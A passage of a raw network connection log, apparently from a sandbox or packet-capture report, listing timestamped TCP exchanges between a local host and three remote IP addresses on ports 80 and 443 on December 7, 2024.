Dec 7, 2024 10:51:55.401082039 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.401134014 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.401175022 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.401925087 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.401976109 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.402039051 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.402118921 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.402846098 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.402893066 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.402940035 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.402981997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.403743029 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.403791904 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.403872013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.404038906 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.404687881 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.404741049 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.404745102 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.404783010 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.405530930 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.405581951 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.405638933 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.405726910 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.406475067 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.406543970 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.406559944 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.406600952 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.407341003 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.407386065 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.784889936 CET	443	49839	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:55.785676956 CET	49839	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:55.785698891 CET	443	49839	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:55.786175013 CET	49839	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:55.786190033 CET	443	49839	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:55.794838905 CET	443	49840	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:55.795439959 CET	49840	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:55.795474052 CET	443	49840	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:55.795958042 CET	49840	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:55.795973063 CET	443	49840	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:55.956556082 CET	443	49841	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:55.957591057 CET	49841	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:55.957612991 CET	443	49841	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:55.958420038 CET	49841	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:55.958425999 CET	443	49841	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:55.962800980 CET	443	49842	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:55.963717937 CET	49842	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:55.963749886 CET	443	49842	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:55.964503050 CET	49842	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:55.964512110 CET	443	49842	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.022670984 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:56.022705078 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:56.142756939 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:56.142781973 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:56.224718094 CET	443	49839	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.224755049 CET	443	49839	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.224819899 CET	443	49839	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.224822998 CET	49839	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.224873066 CET	49839	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.225172043 CET	49839	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.225189924 CET	443	49839	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.225210905 CET	49839	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.225217104 CET	443	49839	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.228864908 CET	49843	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.228902102 CET	443	49843	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.228974104 CET	49843	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.229187965 CET	49843	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.229202986 CET	443	49843	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.230586052 CET	443	49840	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.230660915 CET	443	49840	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.230730057 CET	49840	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.230954885 CET	49840	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.230973959 CET	443	49840	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.230998039 CET	49840	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.231004000 CET	443	49840	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.234251976 CET	49844	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.234283924 CET	443	49844	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.234396935 CET	49844	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.234724045 CET	49844	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.234738111 CET	443	49844	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.391747952 CET	443	49841	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.391810894 CET	443	49841	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.391901016 CET	49841	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.392200947 CET	49841	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.392215014 CET	443	49841	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.392252922 CET	49841	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.392261982 CET	443	49841	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.395979881 CET	49845	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.396011114 CET	443	49845	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.396073103 CET	49845	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.396230936 CET	49845	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.396240950 CET	443	49845	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.403770924 CET	443	49842	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.403794050 CET	443	49842	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.403870106 CET	49842	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.403914928 CET	443	49842	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.404170036 CET	49842	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.404189110 CET	443	49842	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.404197931 CET	49842	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.404320002 CET	443	49842	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.404347897 CET	443	49842	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.404472113 CET	49842	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.407423019 CET	49846	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.407476902 CET	443	49846	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:56.407581091 CET	49846	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.407820940 CET	49846	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:56.407839060 CET	443	49846	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:57.137129068 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:57.137204885 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:57.222138882 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:57.342649937 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:57.668076992 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:57.668116093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:57.668281078 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:57.668318987 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:57.668349028 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:57.671209097 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:57.791181087 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:57.943907022 CET	443	49843	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:57.944855928 CET	49843	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:57.944875956 CET	443	49843	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:57.945421934 CET	49843	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:57.945427895 CET	443	49843	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:57.948451042 CET	443	49844	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:57.948905945 CET	49844	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:57.948915958 CET	443	49844	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:57.949748039 CET	49844	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:57.949763060 CET	443	49844	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.113315105 CET	443	49845	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.113882065 CET	49845	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.113899946 CET	443	49845	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.114432096 CET	49845	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.114437103 CET	443	49845	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.115612984 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:58.115669012 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:58.123497963 CET	443	49846	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.123898983 CET	49846	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.123922110 CET	443	49846	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.124408960 CET	49846	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.124417067 CET	443	49846	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.129059076 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:58.248857975 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:58.268743038 CET	443	49838	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.268822908 CET	443	49838	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.268876076 CET	49838	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.269115925 CET	49838	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.269134045 CET	443	49838	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.272579908 CET	49847	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.272602081 CET	443	49847	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.272931099 CET	49847	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.273116112 CET	49847	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.273127079 CET	443	49847	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.383728027 CET	443	49843	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.383759975 CET	443	49843	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.383825064 CET	49843	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.383842945 CET	443	49843	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.383932114 CET	49843	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.384304047 CET	49843	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.384310007 CET	443	49843	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.384327888 CET	49843	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.384495974 CET	443	49843	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.384526014 CET	443	49843	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.384623051 CET	49843	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.387929916 CET	443	49844	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.387945890 CET	49848	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.387964964 CET	443	49844	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.387974977 CET	443	49848	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.388045073 CET	49848	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.388050079 CET	49844	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.388066053 CET	443	49844	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.388236046 CET	49844	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.388236046 CET	49844	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.388247967 CET	443	49844	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.388416052 CET	443	49844	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.388446093 CET	443	49844	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.388537884 CET	49844	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.390322924 CET	49849	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.390367031 CET	443	49849	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.390454054 CET	49849	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.391009092 CET	49848	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.391021967 CET	443	49848	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.391452074 CET	49849	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.391474009 CET	443	49849	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.549114943 CET	443	49845	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.551594019 CET	443	49845	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.551711082 CET	49845	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.551776886 CET	49845	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.551789999 CET	443	49845	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.551801920 CET	49845	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.551808119 CET	443	49845	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.556391001 CET	49850	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.556452036 CET	443	49850	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.556562901 CET	49850	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.556788921 CET	49850	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.556803942 CET	443	49850	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.558469057 CET	443	49846	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.562252998 CET	443	49846	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.562324047 CET	49846	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.562385082 CET	49846	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.562385082 CET	49846	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.562410116 CET	443	49846	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.562422037 CET	443	49846	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.566471100 CET	49851	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.566540003 CET	443	49851	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:58.566608906 CET	49851	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.566771030 CET	49851	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:58.566790104 CET	443	49851	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:59.060714006 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:59.060784101 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:59.088258982 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:59.208117008 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:59.533237934 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:59.533313036 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:59.537559032 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:51:59.657371044 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:51:59.657459021 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:51:59.657782078 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:51:59.777447939 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:51:59.993192911 CET	443	49847	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:59.993848085 CET	49847	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:59.993863106 CET	443	49847	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:59.994381905 CET	49847	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:59.994388103 CET	443	49847	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.114064932 CET	443	49849	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.114069939 CET	443	49848	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.114666939 CET	49848	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.114666939 CET	49849	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.114682913 CET	443	49848	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.114686966 CET	443	49849	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.115194082 CET	49849	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.115199089 CET	443	49849	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.115509987 CET	49848	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.115515947 CET	443	49848	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.272753000 CET	443	49850	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.273367882 CET	49850	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.273396015 CET	443	49850	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.273963928 CET	49850	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.273968935 CET	443	49850	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.281529903 CET	443	49851	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.282025099 CET	49851	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.282044888 CET	443	49851	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.282454014 CET	49851	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.282459021 CET	443	49851	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.428111076 CET	443	49847	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.431322098 CET	443	49847	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.431545019 CET	49847	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.432848930 CET	49847	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.432861090 CET	443	49847	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.432888031 CET	49847	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.432893038 CET	443	49847	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.437478065 CET	49853	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.437496901 CET	443	49853	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.437666893 CET	49853	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.438023090 CET	49853	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.438031912 CET	443	49853	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.548345089 CET	443	49849	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.548553944 CET	443	49849	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.548648119 CET	49849	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.548680067 CET	49849	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.548693895 CET	443	49849	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.548707962 CET	49849	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.548712969 CET	443	49849	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.548907042 CET	443	49848	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.551662922 CET	49854	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.551690102 CET	443	49854	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.551829100 CET	49854	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.552000999 CET	49854	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.552016020 CET	443	49854	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.552090883 CET	443	49848	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.552150011 CET	49848	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.552182913 CET	49848	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.552192926 CET	443	49848	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.552201986 CET	49848	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.552206993 CET	443	49848	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.554373026 CET	49855	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.554389000 CET	443	49855	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.554454088 CET	49855	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.554582119 CET	49855	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.554591894 CET	443	49855	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.707055092 CET	443	49850	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.710625887 CET	443	49850	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.710715055 CET	49850	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.710828066 CET	49850	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.710828066 CET	49850	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.710845947 CET	443	49850	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.710855007 CET	443	49850	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.714950085 CET	49856	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.714982033 CET	443	49856	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.715192080 CET	49856	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.716284037 CET	443	49851	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.718864918 CET	49856	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.718873024 CET	443	49856	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.719258070 CET	443	49851	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.719322920 CET	49851	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.719573021 CET	49851	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.719573021 CET	49851	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.719593048 CET	443	49851	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.719602108 CET	443	49851	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.723463058 CET	49857	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.723494053 CET	443	49857	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:00.723562956 CET	49857	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.723912001 CET	49857	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:00.723926067 CET	443	49857	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:01.000255108 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.000319958 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.000333071 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.000346899 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.000382900 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.000410080 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.000432968 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.000444889 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.000457048 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.000488043 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.000509977 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.000509977 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.000647068 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.000668049 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.000679016 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.000736952 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.000736952 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.120234013 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.120253086 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.120399952 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.192519903 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.192662001 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.193025112 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.194946051 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.195029974 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.195308924 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.203749895 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.203807116 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.203830957 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.203931093 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.211738110 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.211838961 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.211863041 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.212070942 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.220159054 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.220261097 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.220279932 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.220423937 CET	49852	80	192.168.2.6	185.215.113.16
